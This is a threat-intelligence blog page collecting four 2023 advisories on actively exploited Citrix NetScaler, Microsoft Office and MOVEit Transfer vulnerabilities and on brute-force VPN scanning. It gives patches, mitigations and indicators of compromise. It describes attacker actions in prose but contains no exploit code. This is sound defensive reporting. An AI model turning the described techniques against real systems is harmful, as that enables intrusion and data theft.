Customer portal
Category

Flash Alert

"Citrix
Flash Alert

Flash Alert – Citrix vulnerability being exploited in the wildFlash Alert –

by Daniel Collyer
July 19, 2023

By Daniel Collyer, Threat Intelligence Analyst, SOS Intelligence

Cloud-computing company Citrix has begun alerting customers as to a critical vulnerability in its Netscaler ADC and NetScaler gateway applications.  CVE-2023-3519 has been observed being exploited in the wild, and all users of the affected applications are being urged to ensure recent updates and patches are installed.

For a threat actor to utilise this vulnerability, a vulnerable appliance would need to be configured as a gateway (e.g. CVPN, ICA Proxy, RDP Proxy, VPN virtual server) or as an authentication virtual server (AAA server)

Identified through our OSINTSEARCH tool, exploits against Citrix ADC have been discussed, including the sale of a Remote Code Execution (RCE) exploit, on the cybercrime forum XSS:
 

And with translation…

Citrix strongly advises its customers to switch to updated versions that fixes this issue:

  • NetScaler ADC and NetScaler Gateway 13.1-49.13  and later releases
  • NetScaler ADC and NetScaler Gateway 13.0-91.13  and later releases of 13.0 
  • NetScaler ADC 13.1-FIPS 13.1-37.159 and later releases of 13.1-FIPS 
  • NetScaler ADC 12.1-FIPS 12.1-65.36 and later releases of 12.1-FIPS 
  • NetScaler ADC 12.1-NDcPP 12.1-65.36 and later releases of 12.1-NDcPP

The company notes that NetScaler ADC and NetScaler Gateway version 12.1 have reached the end-of-life stage and customers should upgrade to a newer variant of the product.

Citrix customers can begin researching any potential compromise by identifying web shells that are newer than the last installation date of Citrix software. HTTP error logs may also reveal anomalies indicative of initial exploitation. SysAdmins should also review shell logs for any unexpected commands, which may be indicative of the post-exploitation phase of an attack.

"Office
Flash Alert

Flash Alert – Office zero-day being actively targeted in the wild

by Daniel Collyer
July 14, 2023

By Daniel Collyer, Threat Intelligence Analyst, SOS Intelligence

This was originally sent out to our Flash Alert Subscribers on July 12th. To sign up for this free service, please click here.

Microsoft is actively investigating CVE-2023-36884, an unpatched zero-day vulnerability in their Windows and Office products, amid concerns it is being utilised by nation-state and cybercriminal threat actors to gain remote code execution (RCE) via malicious Office documents.

The zero-day is exploited via specially crafted Office documents, designed to enable RCE.  The victim would be required to open the document for the malicious code to execute.  However, it is reported that the vulnerability could be exploited without user interaction.

Successful exploitation of this vulnerability could pose a significant risk to data, granting threat actors access to confidential and sensitive information, allowing them to bypass or shut down system protections, and/or deny access to compromised systems

The exploit has been identified to have been utilised in a campaign by APT Storm-0978 (AKA DEV-0978, RomCom), aimed at European and North American government and defence entities.

Microsoft provided the following mitigations for the unpatched zero-day:

  • Customers who use Microsoft Defender for Office are protected from attachments that attempt to exploit this vulnerability.
  • In current attack chains, the use of the Block all Office applications from creating child processes Attack Surface Reduction Rule will prevent the vulnerability from being exploited.
  • Organisations that cannot take advantage of these protections can set the FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION registry key to avoid exploitation. Please note that while these registry settings would mitigate exploitation of this issue, they could affect regular functionality for certain use cases related to these applications. Add the following application names to this registry key as values of type REG_DWORD with data 1.:

Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION

  • Excel.exe
  • Graph.exe
  • MSAccess.exe
  • MSPub.exe
  • PowerPoint.exe
  • Visio.exe
  • WinProj.exe
  • WinWord.exe
  • Wordpad.exe


The Twitter post below, from @UK_Daniel_Card, provides the GUID references for Attack Service Reduction (ASR) rules which can be utilised to increase protection.

Microsoft is actively investigating CVE-2023-36884, an unpatched zero-day vulnerability in their Windows and Office products
"Critical
Flash Alert

Flash Alert – Critical vulnerability in MOVEit Transfer

by Daniel Collyer
June 2, 2023

Flash Alert – Critical vulnerability in MOVEit Transfer

By Daniel Collyer, Threat Intelligence Analyst, SOS Intelligence

We have been made aware of a critical, zero-day vulnerability in MOVEit Transfer which is being actively targeted by threat actors to facilitate data theft.

MOVEit Transfer is a managed file transfer (MFT) solution developed by Ipswitch.  It allows the users to securely transfer files between consumers and partners using SFTP, SCP, and HTTP-based uploads.

The exploit, as yet unassigned a CVE, is being utilised by as-yet-unknown threat actors to facilitate mass downloads of victim company data.  

Ipswitch’s parent company Progress Software Corporation have released mitigation advice here, but as of writing, no patches have been released.  We recommend taking necessary precautions to safeguard data until suitable patches have been released.

Key recommendations have been to block traffic across HTTP ports (80 and 443).  This would have the effect of inhibiting certain functions of MOVEit, however, (S)FTP protocols can remain in use for file transfers.  This would seemingly indicate the vulnerability to be web-facing.  It is further recommended to monitor the “c:\MOVEit Transfer\wwwroot\” folder for indications of unexpected files, backups or downloads.

Rapid7 has identified the flaw as an SQL injection vulnerability, leading to remote code execution.  By querying the web shell within exposed MOVEit Transfer servers, and providing the necessary, password-like data within the headers, attackers can leverage access to the services MySQL servers.  This would allow access to perform various actions, such as:

  • Retrieve a list of stored files and relevant metadata
  • Create and remove randomly-named MOVEit Transfer users with the login name ‘Health Check Service’ and create new MySQL sessions.
  • Retrieve information about the configured Azure Blob Storage account, including various settings.  This can then be leveraged to steal data directly from Azure Blob Storage containers.  
  • Download files from the server

Industry reporting has suggested that this incident began on or around 27 May 2023, to coincide with lax monitoring over the US’s Memorial Day weekend.

IOCs

138.197.152[.]201

209.97.137[.]33

5.252.191[.]0/24

148.113.152[.]144 (reported by the community)

89.39.105[.]108

App_Web_<random>.dll (Normally, there will be one of these files.  Presence of more would indicate a breach)

"SOS
Flash Alert

Flash Alert – Brute-Force scanning of VPNs

by Amir Hadzipasic
May 24, 2023

SOS Intelligence has recently seen indications of brute-force login activity against VPN services associated with a customer.  

Our research has linked this activity to an Initial Access Broker (IAB), who has recently released access to a brute force scanning tool through their profile on a high-profile cyber-crime forum. 

Thanks to Daniel, our new Threat Intelligence Analyst who has been investigating this. Future flash alerts and intelligence reports will come from Daniel via email. If you would like to get these, you can sign up here.

The IAB has shared information with our Intelligence Team, showing statistics relating to successful logins they have found whilst scanning VPN networks.

This has highlighted a concerning amount of networks accessible using commonly known default login credentials.  However, the IAB has acknowledged that some of these may represent honeypots.

Source: SOS Intelligence discussion with Bassterlord

Initial Access Brokerage is a common feature of cyber-crime forums.  The individuals concerned involve themselves with the compromise of computer networks. 

Once persistence within the network has been maintained, they monetize that access by selling it within forums, often to actors with access to destructive malware.  Therefore, IAB activity can often be a precursor to Ransomware and/or Data-exfiltration attacks.

Other Discussions identified by the SOS Intelligence Platform related to VPN Provider Scanning

Recommendation

We recommend reviewing any VPN services in use to ensure all default account passwords have been changed, and any built-in accounts have been disabled, in accordance with the best practices of your provider.

At SOS Intelligence we can provide bespoke intelligence feeds to help monitor your data to help you identify when credentials have been leaked and are appearing online, helping you to stay ahead of the attackers and keep your networks safe.

Photo by Kevin Ku on Unsplash

1 2
Recent Posts
Recent Comments
    Privacy Settings
    We use cookies to enhance your experience while using our website. If you are using our Services via a browser you can restrict, block or remove cookies through your web browser settings. We also use content and scripts from third parties that may use tracking technologies. You can selectively provide your consent below to allow such third party embeds. For complete information about the cookies we use, data we collect and how we process them, please check our Privacy Policy
    Youtube
    Consent to display content from - Youtube
    Vimeo
    Consent to display content from - Vimeo
    Google Maps
    Consent to display content from - Google
    Spotify
    Consent to display content from - Spotify
    Sound Cloud
    Consent to display content from - Sound
    Save